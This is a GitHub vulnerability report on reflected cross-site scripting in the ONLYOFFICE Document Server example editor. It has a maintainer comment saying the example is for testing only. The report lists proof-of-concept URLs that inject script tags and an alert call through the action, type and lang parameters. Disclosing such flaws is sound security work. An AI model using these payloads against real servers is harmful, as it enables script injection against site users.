[Vulnerability Report] XSS vulnerability in ONLYOFFICE Document Server Example before v7.0.0 , allows remote attackers inject arbitrary HTML or JavaScript #252
Assignees
Labels
Comments
|
In this scenario, the example is used to exploit this vulnerability, but it is a code example of a Document Management System that is used for testing purposes only and is not used in a production environment. Document Server's example is disabled by default and is not accessible without enabling it first. There is no such vulnerability present in a fully-fledged and integrated Document Server. |
Merged
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Vulnerability Summary
XSS vulnerability in ONLYOFFICE Document Server Example before v7.0.0 , allows remote attackers inject arbitrary HTML or JavaScript.
Vulnerability Url
http://server.domain/example/editor?action=19319874%22%3E%3C/script%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
http://server.domain/example/editor?fileName=new.docx&type=19874%22%3E%3C/script%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
http://server.domain/example/editor?lang=11111%22%3E%3C/script%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
Vulnerability Description
The XSS vulnerability is in several parameters of the path ‘/example/editor’ in ONLYOFFICE Document Server before v7.0.0.
Test Server Version: 7.0.0 Build:132
##Steps To Reproduce
Vulnerability param: action
Vulnerability URL:
http://server.domain/example/editor?action=19319874%22%3E%3C/script%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
Vulnerability param: type
Vulnerability URL:
http://server.domainexample/editor?fileName=new.docx&type=19874%22%3E%3C/script%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
Vulnerability param: lang
Vulnerability URL:
http://server.domain/example/editor?lang=11111%22%3E%3C/script%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
Vulnerability Solution
Close the test example in Document Server
The text was updated successfully, but these errors were encountered: